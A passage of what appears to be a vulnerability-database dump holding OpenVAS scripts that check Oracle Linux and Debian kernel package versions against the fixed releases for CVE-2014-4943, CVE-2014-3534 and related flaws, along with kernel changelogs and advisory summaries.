{\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123356\");\nscript_version(\"$Revision: 6559 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:02:42 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:57:32 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2014-0923\");\nscript_tag(name: \"insight\", value: \"ELSA-2014-0923 - kernel security update - [3.10.0-123.4.4]- Oracle Linux certificates (Alexey Petrenko)[3.10.0-123.4.4]- [net] l2tp_ppp: fail when socket option level is not SOL_PPPOL2TP (Petr Matousek) [1119465 1119466] {CVE-2014-4943}[3.10.0-123.4.3]- [x86] ptrace: force IRET path after a ptrace_stop() (Oleg Nesterov) [1115934 1115935] {CVE-2014-4699}\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2014-0923\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2014-0923.html\");\nscript_cve_id(\"CVE-2014-4943\",\"CVE-2014-4699\");\nscript_tag(name:\"cvss_base\", value:\"6.9\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~123.4.4.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:52:49", "references": ["http://linux.oracle.com/errata/ELSA-2014-1281.html"], "pluginID": "1361412562310123305", "description": "Oracle Linux Local Security Checks ELSA-2014-1281", "edition": 2, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2014-1281", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4943", "CVE-2014-3917", "CVE-2014-3534"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123305", "id": "OPENVAS:1361412562310123305", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2014-1281.nasl 6559 2017-07-06 11:57:32Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123305\");\nscript_version(\"$Revision: 6559 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:02:02 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:57:32 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2014-1281\");\nscript_tag(name: \"insight\", value: \"ELSA-2014-1281 - kernel security and bug fix update - [3.10.0-123.8.1]- Oracle Linux certificates (Alexey Petrenko)[3.10.0-123.8.1]- [scsi] fnic: fix broken FIP discovery by initializing multicast address (Chris Leech) [1119727 1100078]- [scsi] libfcoe: Make fcoe_sysfs optional / fix fnic NULL exception (Chris Leech) [1119727 1100078]- [fs] nfs: Don't mark the data cache as invalid if it has been flushed (Scott Mayhew) [1115817 1114054]- [fs] nfs: Clear NFS_INO_REVAL_PAGECACHE when we update the file size (Scott Mayhew) [1115817 1114054]- [fs] nfs: Fix cache_validity check in nfs_write_pageuptodate() (Scott Mayhew) [1115817 1114054]- [mm] hugetlb: ensure hugepage access is denied if hugepages are not supported (David Gibson) [1122115 1081671]- [kernel] hrtimer: Prevent all reprogramming if hang detected (Prarit Bhargava) [1113175 1094732][3.10.0-123.7.1]- [scsi] set DID_TIME_OUT correctly (Ewan Milne) [1122575 1103881]- [scsi] fix invalid setting of host byte (Ewan Milne) [1122575 1103881]- [scsi] More USB deadlock fixes (Ewan Milne) [1122575 1103881]- [scsi] Fix USB deadlock caused by SCSI error handling (Ewan Milne) [1122575 1103881]- [scsi] Fix command result state propagation (Ewan Milne) [1122575 1103881]- [scsi] Fix spurious request sense in error handling (Ewan Milne) [1122575 1103881]- [input] synaptics: fix resolution for manually provided min/max (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: change min/max quirk table to pnp-id matching (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add a matches_pnp_id helper function (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: T540p - unify with other LEN0034 models (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add min/max quirk for the ThinkPad W540 (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add min/max quirk for ThinkPad Edge E431 (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add min/max quirk for ThinkPad T431s, L440, L540, S1 Yoga and X1 (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: report INPUT_PROP_TOPBUTTONPAD property (Benjamin Tissoires) [1122559 1093449]- [input] Add INPUT_PROP_TOPBUTTONPAD device property (Benjamin Tissoires) [1122559 1093449]- [input] i8042: add firmware_id support (Benjamin Tissoires) [1122559 1093449]- [input] serio: add firmware_id sysfs attribute (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add manual min/max quirk for ThinkPad X240 (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: add manual min/max quirk (Benjamin Tissoires) [1122559 1093449]- [input] synaptics: fix incorrect placement of __initconst (Benjamin Tissoires) [1122559 1093449]- [ethernet] be2net: Fix invocation of be_close() after be_clear() (Ivan Vecera) [1122558 1066644]- [ethernet] be2net: enable interrupts in EEH resume (Ivan Vecera) [1121712 1076682]- [ethernet] sfc: PIO:Restrict to 64bit arch and use 64-bit writes (Nikolay Aleksandrov) [1119725 1089024]- [kernel] ftrace: Hardcode ftrace_module_init() call into load_module() (Takahiro MUNEDA) [1119721 1061553]- [kernel] trace: Make register/unregister_ftrace_command __init (Takahiro MUNEDA) [1119721 1061553]- [block] nvme: Initialize device reference count earlier (David Milburn) [1119720 1081734]- [ata] ahci: accommodate tag ordered controller (David Milburn) [1117154 1083746]- [s390] af_iucv: recvmsg problem for SOCK_STREAM sockets (Hendrik Brueckner) [1115585 1109703]- [s390] af_iucv: correct cleanup if listen backlog is full (Hendrik Brueckner) [1115584 1109033]- [mm] Revert: vmscan: do not swap anon pages just because free+file is low (Johannes Weiner) [1114938 1102991]- [drm] nouveau/bios: fix a bit shift error introduced by recent commit (Ulrich Obergfell) [1114869 1089936]- [ethernet] bnx2x: Adapter not recovery from EEH error injection (Michal Schmidt) [1107722 1067154]- [kernel] auditsc: audit_krule mask accesses need bounds checking (Denys Vlasenko) [1102708 1102710] {CVE-2014-3917}- [block] mtip32xx: mtip_async_complete() bug fixes (Jeff Moyer) [1125776 1102281]- [block] mtip32xx: Unmap the DMA segments before completing the IO request (Jeff Moyer) [1125776 1102281]- [net] l2tp: don't fall back on UDP [get or set]sockopt (Petr Matousek) [1119465 1119466] {CVE-2014-4943}- [s390] ptrace: correct insufficient sanitization when setting psw mask (Hendrik Brueckner) [1114090 1113673] {CVE-2014-3534}\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2014-1281\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2014-1281.html\");\nscript_cve_id(\"CVE-2014-3917\");\nscript_tag(name:\"cvss_base\", value:\"3.3\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~123.8.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-01T10:48:40", "references": ["http://www.debian.org/security/2014/dsa-2992.html"], "pluginID": "702992", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation:\n\nCVE-2014-3534 \nMartin Schwidefsky of IBM discovered that the ptrace subsystem does\nnot properly sanitize the psw mask value. On s390 systems, an\nunprivileged local user could use this flaw to set address space\ncontrol bits to kernel space combination and thus gain read/write\naccess to kernel memory.\n\nCVE-2014-4667 \nGopal Reddy Kodudula of Nokia Siemens Networks discovered that the\nsctp_association_free function does not properly manage a certain\nbacklog value, which allows remote attackers to cause a denial of\nservice (socket outage) via a crafted SCTP packet.\n\nCVE-2014-4943 \nSasha Levin discovered a flaw in the Linux kernel's point-to-point\nprotocol (PPP) when used with the Layer Two Tunneling Protocol\n(L2TP). An unprivileged local user could use this flaw for privilege\nescalation.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-07-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2992-1 (linux - security update)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4943", "CVE-2014-3534", "CVE-2014-4667"], "modified": "2017-07-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702992", "id": "OPENVAS:702992", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2992.nasl 6735 2017-07-17 09:56:49Z teissa $\n# Auto-generated from advisory DSA 2992-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"linux on Debian Linux\";\ntag_insight = \"The Linux kernel is the core of the Linux operating system.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.60-1+deb7u3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.14.13-2.\n\nWe recommend that you upgrade your linux packages.\";\ntag_summary = \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation:\n\nCVE-2014-3534 \nMartin Schwidefsky of IBM discovered that the ptrace subsystem does\nnot properly sanitize the psw mask value. On s390 systems, an\nunprivileged local user could use this flaw to set address space\ncontrol bits to kernel space combination and thus gain read/write\naccess to kernel memory.\n\nCVE-2014-4667 \nGopal Reddy Kodudula of Nokia Siemens Networks discovered that the\nsctp_association_free function does not properly manage a certain\nbacklog value, which allows remote attackers to cause a denial of\nservice (socket outage) via a crafted SCTP packet.\n\nCVE-2014-4943 \nSasha Levin discovered a flaw in the Linux kernel's point-to-point\nprotocol (PPP) when used with the Layer Two Tunneling Protocol\n(L2TP). An unprivileged local user could use this flaw for privilege\nescalation.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702992);\n script_version(\"$Revision: 6735 $\");\n script_cve_id(\"CVE-2014-3534\", \"CVE-2014-4667\", \"CVE-2014-4943\");\n script_name(\"Debian Security Advisory DSA 2992-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-17 11:56:49 +0200 (Mon, 17 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-29 00:00:00 +0200 (Tue, 29 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2992.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = 